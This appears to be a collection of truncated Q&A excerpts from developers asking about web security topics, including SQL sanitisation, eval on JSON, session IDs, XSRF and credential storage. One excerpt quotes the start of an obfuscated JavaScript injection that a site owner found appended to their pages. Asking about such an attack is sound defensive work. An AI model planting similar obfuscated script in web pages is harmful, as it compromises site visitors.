I have a system where employees can upload files. There are three ways Upload to my account in public, private or protected mode Upload to department account in public, private or protected mode Upload to organization account in public, private or protected mode where public is visible to anyone, private to the group or person only...
Question: I'm using eval to parse a JSON return value from one of my WebMethods. I prefer not to add jquery-json because the transfer volume is already quite large. So I parse the JSON return value with eval. Now rumors go that this is insecure. Why ? Nobody can modify the JSOn return value unless they hack my server, in which case I...
So a bit of background, I'm working on an existing web application which has a set of users, who are able to log in via a traditional login screen with a user name and password, etc. Recently we've managed to score a client (who have their own Intranet site), who are wanting to be able to have their users log into their Intranet site...
i got this SQL query where post_title taken from $_GET $sql = "SELECT ID FROM posts WHERE posts.post_title = '5-design-web-colourful'"; What is the best way to sanitize this and make it more safe ? EDIT : (as requested) I'm trying to create a plugin that work to hide a particular category (named private) and all of its post for ever...
I'm writing my own sessions controller that issues a unique id to a user once logged in, and then verifies and authenticates that unique id at every page load. What is the most secure way to generate such an id? Should the unique id be completely random? Is there any downside to including the user id as part of the unique id? ...
I'm wondering which additional security measures one could take besides a traditional login with user and password. What do you think of this one: _manually adding a cookie to each client which includes a secret key _this cookie is not served by the webserver, it is actually copied "by hand" to each client computer _if a client conn...
I work on a project known as the Security Development Lifecycle (SDL) project at Microsoft (http://microsoft.com/sdl) - in short it's a set of practices that must be used by product groups before they ship products to help improve security. Over the last couple of years, we have published a great deal of SDL documentation, as customers ...
Hello, To keep things simple, please allow the "assumption" that some code requires the use of a full URL, even though the domain is on the same server, i.e. a simple file path cannot be used. TCP/IP?? Question: If a form action target = "http://this-full-URL.com/postdata" (for example) and that URL is also on the same server, then whic...
I want to write a web-app which would ask the user to pass their google account (user and pwd) so that it can access their google data. I understand google supports alternative ways to do this, such as AuthSub and OathAuthSub. Also google discourages apparently clientLogin (which would be my approach) for web apps. My question is: if...
I have a method that attempts to update a sql server database in an ASP.NET application. If the update fails, it catches the exception and then queues the update in MSMQ, and then spins up a new thread that will later de-queue the pending update and try again. When the thread starts, it fails to open a database connection because it is a...
My goal is to become a good web developer. I'm interested in learning how to build complex websites as well as how to write web applications. I want skills that will enable me to write apps for <--insert hottest web trend here--> (Facebook & iphone apps for example) This is one of my goals as far as Tech. is concerned. I'd also like...
sHi folk, I've been storing SQL connection strings in web.conf which is fine but now I need to store SMTP credentials somewhere protected. web.conf seems like the likeliest place since its protected but how can they be stored? I've added the details to my web.conf but amnot sure how to reference them <system.net> <mailSettings> ...
Hi, I am on my dissertation in my final year at university at the moment. One of the areas I need to research is security - for both websites and for databases. I currently have sections on the following: Website Form security - such as data validation. This section is more about preventing errors made by legitimate users as much as ...
Hello all, Asp.net webformview engine is quite flexible and easy to be used in the projects. I have been facing with a small problem recently. SECURITY! I want my users to design the web pages in front. BUT!! with a small code, the people who have bad intention, can get the content of my dll files in bin folder. e.g. <% Syst...
I'm having significant difficulty locating the root cause for a secure/insecure message comming from IE. I've looked through the entire output and there are NO references to http: I've searched for unsource Iframes, which cause this message, and there are none and other than jquery 1.4 there isn't even the text "iframe" in the source....
I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(...
I have an existing j2ee application running on Oracle App Server. It is targeted towards paying customers so the content is secured and a SSO module properly intercepts all requests for secured content. Now the company is adding a unbranded public-facing module with a number of unsecured pages. At one point the user is expected to reg...
Hi, we are doing XSRF fixes for our code. we are using the session token to request token comparison method to achieve this. in case when session token is not equal to request token we will be redirecting to error page. Problem:Once we are in Main Menu page, if the user "refresh" the page, it is throwing XSRF issue. Reason: As there won...
What are the possible ways to authenticate user when websocket connection is used? Example scenario: Web based multi-user chat application through encrypted websocket connection. How can I ensure (or guarantee) that each connection in this application belongs to certain authenticated user and "can't be" exploited by false user impersona...
Hi How to protect files (documents, images..) that r being sold over internet. Is it possible to Deny access to all except a particular php file that lists those documents. for instance www.mysite.com/list dir tree: + myfiles | |--img1.jpg |--doc.pdf + application |-+controllers |-lister.php Can i grant access to myfiles DIR on...